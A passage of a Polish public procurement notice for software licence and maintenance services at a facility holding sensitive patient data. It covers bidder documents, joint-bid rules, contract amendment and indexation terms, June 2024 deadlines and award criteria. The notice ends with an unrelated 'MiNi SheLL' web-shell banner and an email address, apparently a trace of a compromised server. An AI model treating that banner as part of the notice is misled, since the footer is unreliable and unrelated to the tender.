rejestru lub ewidencji.<br/>2. Podmiotowe środki dowodowe podmiotów zagranicznych, w celu potwierdzenia braku podstaw do wykluczenia Wykonawcy z<br/>udziału w postępowaniu:<br/>1) jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast odpisu albo<br/>informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, o których mowa w<br/>Rozdziale XIII ust. 1 pkt 2) SWZ - składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub<br/>miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie<br/>zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się<br/>on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.<br/>Dokument powinien być wystawiony nie wcześniej niż 3 (trzy) miesiące przed jego złożeniem.<br/>2) jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się ww. dokumentów lub gdy dokumenty<br/>te nie odnoszą się do wszystkich przypadków, o których mowa wyżej, zastępuje się je odpowiednio w całości lub w części<br/>dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego<br/>reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym<br/>Wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem<br/>sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na<br/>siedzibę lub miejsce zamieszkania Wykonawcy. Terminy wystawienia ww. dokumentów stosuje się.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)<br/>Oświadczenie, zgodnie z Załącznikiem nr 4 do SWZ, w postaci elektronicznej opatrzone kwalifikowanym podpisem elektronicznym,<br/>podpisem zaufanym albo podpisem osobistym, obejmujący oświadczenie Wykonawcy o spełnianiu warunków udziału w<br/>postępowaniu, braku podstaw do wykluczenia - Załącznik nr 4 do SWZ.<br/>2) Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia wobec nich podstaw wykluczenia<br/>oraz spełniania, w zakresie, w jakim powołuje się na ich zasoby, warunków udziału w Postępowaniu, składa także oświadczenie,<br/>którego wzór stanowi Załącznik nr 4 do SWZ, dotyczące tych podmiotów.<br/>3) Zamawiający wymaga przedstawienia oświadczenia, którego wzór stanowi Załącznik nr 4 do SWZ, przez podwykonawców, na<br/>którego zasobach Wykonawca nie polega przy wykazywaniu warunków udziału w Postępowaniu.<br/>4) W przypadku, gdy Wykonawca przy wykazaniu spełniania warunków udziału w Postępowaniu, będzie polegał na zdolnościach lub<br/>sytuacji innych podmiotów, musi udowodnić Zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami<br/>tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów<br/>na potrzeby realizacji zamówienia. Wzór zobowiązania zawiera się w treści Załącznika nr 4 do SWZ.<br/>8) Wykaz usług, zgodny z Załącznikiem nr 6 do SWZ, wraz z dokumentami potwierdzającymi należyte wykonanie usługi.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Pełnomocnictwo do reprezentowania Wykonawcy w niniejszym Postępowaniu lub do reprezentowania Wykonawcy i do<br/>podpisania umowy (o ile nie wynika z dokumentów rejestracyjnych). Pełnomocnictwo musi być sporządzone w postaci<br/>dokumentu elektronicznego, opatrzonego kwalifikowanym podpisem elektronicznym przez osobę/osoby uprawnione, w<br/>świetle dokumentów rejestracyjnych, do reprezentowania Wykonawcy. Dopuszcza się pełnomocnictwo sporządzone w<br/>postaci elektronicznej,<br/>w formie oryginalnego aktu notarialnego albo notarialnie potwierdzonej za zgodność z oryginałem kopii,<br/>opatrzonego/opatrzonej kwalifikowanym podpisem elektronicznym przez notariusza. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, którego wzór stanowi Załącznik<br/>nr 4 do SWZ, w części dot. braku podstaw do wykluczenia z Postępowania, winno być podpisane przez każdego z<br/>Wykonawców wspólnie ubiegających się o zamówienie. Dokument ten potwierdza spełnianie warunków udziału w<br/>Postępowaniu lub kryteriów selekcji oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje<br/>spełnianie warunków udziału w Postępowaniu lub kryteriów selekcji oraz brak podstaw wykluczenia.<br/>2) W przypadku składania oferty wspólnej, tj. oferty Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>zgodnie z art. 58 ust. 2 Ustawy, do oferty należy dołączyć pełnomocnictwo, podpisane przez wszystkich partnerów,<br/>ustanawiające pełnomocnika Wykonawców do reprezentowania ich w Postępowaniu o udzielenie zamówienia albo do<br/>reprezentowania w Postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, przy czym Zamawiający będzie<br/>żądał przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców.<br/>Umowa, o której mowa w zdaniu poprzedzającym, nie może być zawarta na okres krótszy niż termin realizacji zamówienia.<br/>Podmioty występujące wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązań. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Oprócz zmian wskazanych w art. 455 ust. 1 pkt 2-4 i ust. 2 Ustawy, Strony, działając na podstawie art. 455 ust. 1 pkt 1 Ustawy, przewidują możliwość wprowadzenia następujących zmian do Umowy prawo do wprowadzenia następujących zmian do Umowy:<br/>1)	zmiana cen jednostkowych na korzyść Zamawiającego;<br/>2)	zmiana stawki podatku od towarów i usług w zakresie wynikającym ze zmiany zapisów ustawowych, przy czym ceny jednostkowe netto oraz ogólna wartość brutto Umowy pozostaną niezmienione;<br/>3)	zmiana w przypadku wystąpienia innych okoliczności, niemożliwych do przewidzenia <br/>na etapie prowadzenia Postępowania, której wprowadzenie jest niezbędne do prawidłowej realizacji Umowy, a nie spowoduje ona zmian charakteru zawartej Umowy – zmiana wymaga sporządzenia pisemnego aneksu i następuje na wniosek jednej ze Stron,<br/>4)	gdy wystąpi konieczność wykonania innych prac niezbędnych do wykonania przedmiotu Umowy ze względu na zasady wiedzy technicznej, oraz udzielenia zamówień dodatkowych, o których mowa w art. 214 ust. 1 pkt 7 Ustawy, które wstrzymują lub opóźniają realizację przedmiotu Umowy;<br/>2.	Dopuszcza się również możliwość wprowadzenia zmian Umowy, która została zawarta <br/>na okres powyżej 6 (sześciu) miesięcy, dotyczących wynagrodzenia Wykonawcy, poprzez jego waloryzację, w sytuacji spełnienia niżej wymienionych wymagań:<br/>1)	w przypadku istotnej zmiany ceny materiałów lub kosztów związanych z realizacją zamówienia, rozumianej jako wzrost odpowiednio cen lub kosztów, jak i ich obniżenie, względem ceny lub kosztu przyjętych w celu ustalenia wynagrodzenia Wykonawcy zawartego w Ofercie Wykonawcy stanowiącej Załącznik nr 5 do Umowy, oraz<br/>2)	przy zachowaniu niżej określonych warunków i postanowień Umowy określonych w ust. 3, 4 i 5 poniżej.<br/>3.	W przypadku dokonywania waloryzacji wynagrodzenia, o której mowa w ust. 2 powyżej, <br/>z zastrzeżeniem ust. 9 niniejszego paragrafu, wynagrodzenie Wykonawcy, określone w § 5 ust. 2 i 3 Umowy, będzie waloryzowane o aktualny wskaźnik stanowiący różnicę odchylenia wskaźnika inflacji za ostatnie 2 (dwa) kwartały przy łącznym spełnieniu następujących postanowień:<br/>1)	podwyższenie wynagrodzenia Wykonawcy – nastąpi na wniosek Wykonawcy, złożony najwcześniej po upływie 6 (sześciu) miesięcy od dnia zawarcia Umowy przez Strony oraz przy wzroście Wskaźnika waloryzacji określonego powyżej, o co najmniej 15% za ostatnie 2 (dwa) kwartały poprzedzające złożenie wniosku o waloryzację,<br/>2)	obniżenie wynagrodzenia Wykonawcy – nastąpi w wyniku działań Zamawiającego, podjętych co najmniej po upływie każdych 6 (sześciu) miesięcy od zawarcia Umowy przez Strony oraz przy obniżeniu Wskaźnika waloryzacji określonego powyżej, o co najmniej 15% za ostatnie 2 (dwa) kwartały poprzedzające działania Zamawiającego o waloryzację, z uwzględnieniem, iż waloryzacja będzie obliczana na podstawie średniej wskaźników określonych według Wskaźnika waloryzacji określonego powyżej, za ostatnie 2 (dwa) kwartały poprzedzające złożenie wniosku o waloryzację / działań Zamawiającego, z uwzględnieniem, iż pierwsza (i każda kolejna) waloryzacja dokonana:<br/>3)	na wniosek Wykonawcy – nastąpi tylko i wyłącznie w przypadku, gdy Wykonawca na dzień złożenia wniosku o waloryzację realizuje Przedmiot Umowy,<br/>4)	w wyniku działań Zamawiającego – nastąpi bez względu na fakt czy Wykonawca na dzień podjęcia działań Zamawiającego realizuje Przedmiot Umowy czy dopuszcza się zwłoki.<br/>4.	Zmiany Umowy wymagają formy pisemnej w postaci aneksu pod rygorem nieważności.<br/>szczegółowe zapisy znajdują się w § 8 Zmiany Umowy wzoru umowy, stanowiącego załącznik nr 3 do SWZ, <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-06-12 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/935320</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-06-12 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> 1)	Cena „Co” – 60 %, tj. miesięcznego wynagrodzenia ryczałtowego, w rozbiciu <br/>na podkryteria, w skład którego wchodzą kwoty, z tytułu:<br/>a)	z tytułu świadczenia dostępu do nowych wersji Programu „S” – „A”, o którym mowa w pkt I Opisu przedmiotu zamówienia, stanowiącego Załącznik nr 1 do SWZ – 25%; <br/>b)	z tytułu świadczenia Opieki serwisowej – „B”, o której mowa w pkt II.2 Opisu przedmiotu zamówienia, stanowiącego Załącznik nr 1 do SWZ – 25%,<br/>c)	z tytułu zapewnienia dostępu do funkcjonalności dedykowanej formularzy <br/>i modułów dla CZP-B – „C”, o której mowa w pkt I Opisu przedmiotu zamówienia, stanowiącego Załącznik nr 1 do SWZ – 10%;<br/><br/>2)	Czas naprawy w przypadku błędu krytycznego „Cn”– 40 %. <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Brak podziału zamówienia na części wynika z uwarunkowań organizacyjnych, a mianowicie w systemie przechowywane są<br/>dane osobowe wrażliwe pacjentów, których ochrona i niwelowanie ryzyka wycieku, stanowi uzasadnienie dla ograniczenia<br/>grona Wykonawców.

Creat By MiNi SheLL
Email: jattceo@gmail.com